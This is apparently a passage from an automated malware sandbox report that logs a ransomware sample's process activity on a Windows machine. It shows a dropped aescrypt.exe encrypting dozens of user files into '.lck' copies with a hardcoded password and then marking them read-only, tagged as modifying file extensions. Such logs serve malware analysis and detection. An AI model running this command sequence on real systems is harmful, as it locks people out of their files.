C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Downloads.lnk.lck" "Downloads.lnk"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "Downloads.lnk.lck"3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "BackupUnpublish.docx.lck" "BackupUnpublish.docx"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "BackupUnpublish.docx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConvertFromDismount.asp.lck" "ConvertFromDismount.asp"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ConvertFromDismount.asp.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "CopyStop.cfg.lck" "CopyStop.cfg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "CopyStop.cfg.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "EnableSelect.vb.lck" "EnableSelect.vb"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "EnableSelect.vb.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "EditUnprotect.ttc.lck" "EditUnprotect.ttc"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "EditUnprotect.ttc.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "MergeLock.pps.lck" "MergeLock.pps"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "MergeLock.pps.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "MergeSkip.exe.lck" "MergeSkip.exe"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "MergeSkip.exe.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "OptimizeOpen.htm.lck" "OptimizeOpen.htm"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "OptimizeOpen.htm.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ProtectBlock.html.lck" "ProtectBlock.html"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ProtectBlock.html.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "MountEdit.ex_.lck" "MountEdit.ex_"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "MountEdit.ex_.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "OutHide.eps.lck" "OutHide.eps"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "OutHide.eps.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ReceivePop.shtml.lck" "ReceivePop.shtml"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ReceivePop.shtml.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConnectAdd.mpp.lck" "ConnectAdd.mpp"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ConnectAdd.mpp.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DenyApprove.odt.lck" "DenyApprove.odt"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "DenyApprove.odt.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "BlockWait.rar.lck" "BlockWait.rar"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "BlockWait.rar.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "LockSave.wav.lck" "LockSave.wav"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "LockSave.wav.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "InstallSet.bin.lck" "InstallSet.bin"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "InstallSet.bin.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "PublishUpdate.jpe.lck" "PublishUpdate.jpe"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "PublishUpdate.jpe.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "JoinWait.pot.lck" "JoinWait.pot"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "JoinWait.pot.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "HideUnlock.nfo.lck" "HideUnlock.nfo"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "HideUnlock.nfo.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "OutSuspend.gif.lck" "OutSuspend.gif"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "OutSuspend.gif.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "OutExit.potx.lck" "OutExit.potx"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "OutExit.potx.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnlockJoin.TS.lck" "UnlockJoin.TS"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "UnlockJoin.TS.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RestoreReset.cfg.lck" "RestoreReset.cfg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RestoreReset.cfg.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DebugPop.mpeg.lck" "DebugPop.mpeg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "DebugPop.mpeg.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "CheckpointSet.zip.lck" "CheckpointSet.zip"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "CheckpointSet.zip.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RestoreRegister.odt.lck" "RestoreRegister.odt"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RestoreRegister.odt.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RevokeDeny.xps.lck" "RevokeDeny.xps"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RevokeDeny.xps.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RegisterConvertFrom.wma.lck" "RegisterConvertFrom.wma"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RegisterConvertFrom.wma.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "LimitDismount.wdp.lck" "LimitDismount.wdp"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "LimitDismount.wdp.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DisablePing.hta.lck" "DisablePing.hta"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "DisablePing.hta.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "PopMerge.mov.lck" "PopMerge.mov"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "PopMerge.mov.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ResumeSave.TS.lck" "ResumeSave.TS"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ResumeSave.TS.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ExpandOpen.reg.lck" "ExpandOpen.reg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ExpandOpen.reg.lck"3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Wallpaper.jpg.lck" "Wallpaper.jpg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "Wallpaper.jpg.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RenameTest.raw.lck" "RenameTest.raw"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "RenameTest.raw.lck"3⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UninstallPush.dib.lck" "UninstallPush.dib"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "UninstallPush.dib.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "CompleteOpen.svgz.lck" "CompleteOpen.svgz"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "CompleteOpen.svgz.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConvertEnable.wmf.lck" "ConvertEnable.wmf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ConvertEnable.wmf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SyncOpen.png.lck" "SyncOpen.png"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "SyncOpen.png.lck"3⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RequestBackup.pcx.lck" "RequestBackup.pcx"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RequestBackup.pcx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ExportHide.bmp.lck" "ExportHide.bmp"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ExportHide.bmp.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "TraceStop.raw.lck" "TraceStop.raw"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "TraceStop.raw.lck"3⤵
- Modifies extensions of user files
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SearchCheckpoint.gif.lck" "SearchCheckpoint.gif"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "SearchCheckpoint.gif.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ResumeConfirm.dib.lck" "ResumeConfirm.dib"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ResumeConfirm.dib.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "OpenSkip.dwg.lck" "OpenSkip.dwg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "OpenSkip.dwg.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "MeasureSend.cr2.lck" "MeasureSend.cr2"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "MeasureSend.cr2.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "WatchHide.tif.lck" "WatchHide.tif"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "WatchHide.tif.lck"3⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "CompleteEnable.dxf.lck" "CompleteEnable.dxf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "CompleteEnable.dxf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SendRestart.ico.lck" "SendRestart.ico"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "SendRestart.ico.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ClearTrace.emz.lck" "ClearTrace.emz"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ClearTrace.emz.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SwitchRestart.tif.lck" "SwitchRestart.tif"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "SwitchRestart.tif.lck"3⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "OutInitialize.crw.lck" "OutInitialize.crw"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "OutInitialize.crw.lck"3⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ResumeSync.crw.lck" "ResumeSync.crw"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "ResumeSync.crw.lck"3⤵
- Modifies extensions of user files
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ExportUndo.eps.lck" "ExportUndo.eps"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ExportUndo.eps.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "InitializeConvert.tiff.lck" "InitializeConvert.tiff"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "InitializeConvert.tiff.lck"3⤵
- Modifies extensions of user files
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DisconnectPop.bmp.lck" "DisconnectPop.bmp"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "DisconnectPop.bmp.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "WriteDisable.emf.lck" "WriteDisable.emf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "WriteDisable.emf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "CloseExpand.dxf.lck" "CloseExpand.dxf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "CloseExpand.dxf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ReadRegister.tiff.lck" "ReadRegister.tiff"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "ReadRegister.tiff.lck"3⤵
- Modifies extensions of user files
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ReadDismount.jpg.lck" "ReadDismount.jpg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ReadDismount.jpg.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConnectWait.svg.lck" "ConnectWait.svg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ConnectWait.svg.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DismountFind.emf.lck" "DismountFind.emf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "DismountFind.emf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UpdateUnblock.svg.lck" "UpdateUnblock.svg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "UpdateUnblock.svg.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "GrantFind.png.lck" "GrantFind.png"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "GrantFind.png.lck"3⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "TraceRead.dxf.lck" "TraceRead.dxf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "TraceRead.dxf.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "BackupSync.dib.lck" "BackupSync.dib"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "BackupSync.dib.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RepairSearch.crw.lck" "RepairSearch.crw"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "RepairSearch.crw.lck"3⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "GetFind.png.lck" "GetFind.png"3⤵
- Modifies extensions of user files
-
